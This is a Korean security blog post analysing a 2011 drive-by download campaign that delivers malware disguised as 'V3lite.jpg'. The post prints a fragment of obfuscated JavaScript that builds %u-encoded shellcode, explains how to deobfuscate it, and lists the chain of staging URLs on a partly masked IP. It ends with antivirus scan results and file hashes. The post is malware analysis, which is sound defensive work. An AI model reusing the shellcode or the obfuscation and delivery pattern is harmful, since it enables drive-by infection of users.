본문 바로가기

security/악성코드 유포

V3lite.jpg 로 위장한 악성코드 !!!!!!


오랜만에 풀려하니 안풀리네요.........ㅋ

var nb194608="";nb194608+="%u585";nb194608+="8%u5858";nb194608+="%u10EB%";nb194608+="u4B5B%u";nb194608+="C933%uB";nb194608+="966%u03";nb194608+="B8%u348";nb194608+="0%uBD0B";nb194608+="%uFAE2%";nb194608+="u05EB%u";nb194608+="EBE8%uF";nb194608+="FFF%u54";nb194608+="FF%uBEA";nb194608+="3%uBDBD";nb194608+="%uD9E2%";nb194608+="u8D1C%u";nb194608+="BDBD%u3";nb194608+="6BD%uB1";nb194608+="FD%uCD3";nb194608+="6%u10A1"

올만에 하니...... 아 어렵네요 !!!ㅎ
완전 ... 심플한 우리의 코드.......... 정말 멋집니다... 여기서 주목할 점은 !!
코드가 반복되고 있는것 입니다 !!
바로바로 ";nb194608+=" 이것 입니다 !

제거를 하면 바로 ....... 코드가 주르르르르르르~

힌트는 바로
";nb194608+=" 를 제거 한다면 간단히 나올수 있습니다.

이런걸 하지 않고 속성적인 방법은 바로 맨 아래 있습니다 !

%u8f8c(중간코드 생랙)%udacd%ubdbd

그럼 바로 최종 파일 까지 접근을 완료 할 수 있습니다 !!
정말 오랜만에 쓸려니... 안써지네요 ........ 역시 ....... 힘드네요..

[연결 사이트]

http://174.128.224.xx/top.html
http://174.128.224.xx/ad.html ~> 최종파일다운 및 nf.swf 연결
http://174.128.224.xx/nb.swf ~> 멀까요??
http://174.128.224.xx/banner.html ~> 최종파일 다운
http://174.128.224.xx:xx/V3lite.jpg ~> 최종파일 !!

File name:
V3lite.jpg
Submission date:
2011-06-05 03:32:03 (UTC)
Result:
17 /41 (41.5%)

Antivirus Version Last Update Result
AhnLab-V3 2011.06.04.00 2011.06.03 -
AntiVir 7.11.9.27 2011.06.04 TR/Obfuscate.GE.50
Antiy-AVL 2.0.3.7 2011.06.05 -
Avast 4.8.1351.0 2011.06.04 NSIS:Downloader-QK
Avast5 5.0.677.0 2011.06.04 NSIS:Downloader-QK
AVG 10.0.0.1190 2011.06.04 -
BitDefender 7.2 2011.06.05 -
CAT-QuickHeal 11.00 2011.06.04 -
ClamAV 0.97.0.0 2011.06.05 -
Commtouch 5.3.2.6 2011.06.04 W32/Zlob.AF.gen!Eldorado
Comodo 8949 2011.06.04 -
DrWeb 5.0.2.03300 2011.06.05 -
eSafe 7.0.17.0 2011.06.02 -
eTrust-Vet 36.1.8366 2011.06.03 -
F-Prot 4.6.2.117 2011.06.04 W32/Zlob.AF.gen!Eldorado
Fortinet 4.2.257.0 2011.06.04 -
GData 22 2011.06.05 NSIS:Downloader-QK
Ikarus T3.1.1.104.0 2011.06.04 Virus.Win32.Gamona
Jiangmin 13.0.900 2011.06.01 -
K7AntiVirus 9.104.4769 2011.06.04 Trojan-Downloader
Kaspersky 9.0.0.837 2011.06.05 Trojan-Dropper.Win32.Agent.exkk
McAfee 5.400.0.1158 2011.06.05 -
McAfee-GW-Edition 2010.1D 2011.06.05 -
Microsoft 1.6903 2011.06.05 VirTool:Win32/Obfuscator.GE
NOD32 6180 2011.06.05 -
Norman 6.07.07 2011.06.04 W32/Suspicious_Gen2.MPKAY
nProtect 2011-06-04.01 2011.06.04 Trojan-Dropper/W32.Agent.82338
Panda 10.0.3.5 2011.06.04 Trj/CI.A
PCTools 7.0.3.5 2011.06.03 -
Prevx 3.0 2011.06.05 -
Rising 23.60.03.09 2011.06.03 Packer.Win32.Agent.bd
Sophos 4.66.0 2011.06.04 -
SUPERAntiSpyware 4.40.0.1006 2011.06.05 Trojan.Agent/Gen-ImageDocFake
Symantec 20111.1.0.186 2011.06.05 -
TheHacker 6.7.0.1.220 2011.06.04 -
TrendMicro 9.200.0.1012 2011.06.04 -
TrendMicro-HouseCall 9.200.0.1012 2011.06.05 -
VBA32 3.12.16.0 2011.06.03 -
VIPRE 9488 2011.06.05 -
ViRobot 2011.6.4.4496 2011.06.04 Dropper.Agent.82338
VirusBuster 14.0.67.1 2011.06.04 Trojan.CL.Agent!ICu9KO2GEMw
Additional information
 
MD5   : a5466f7f8c11cc9ebc18ba36e28d3a07
SHA1  : 2951dd7278557809fa6d5d0b8a5ab7be29b20866
SHA256: d03ff162883fdb09e3e5a2dd3d46ef32412b816ba5d9c73d288f8b61e979345a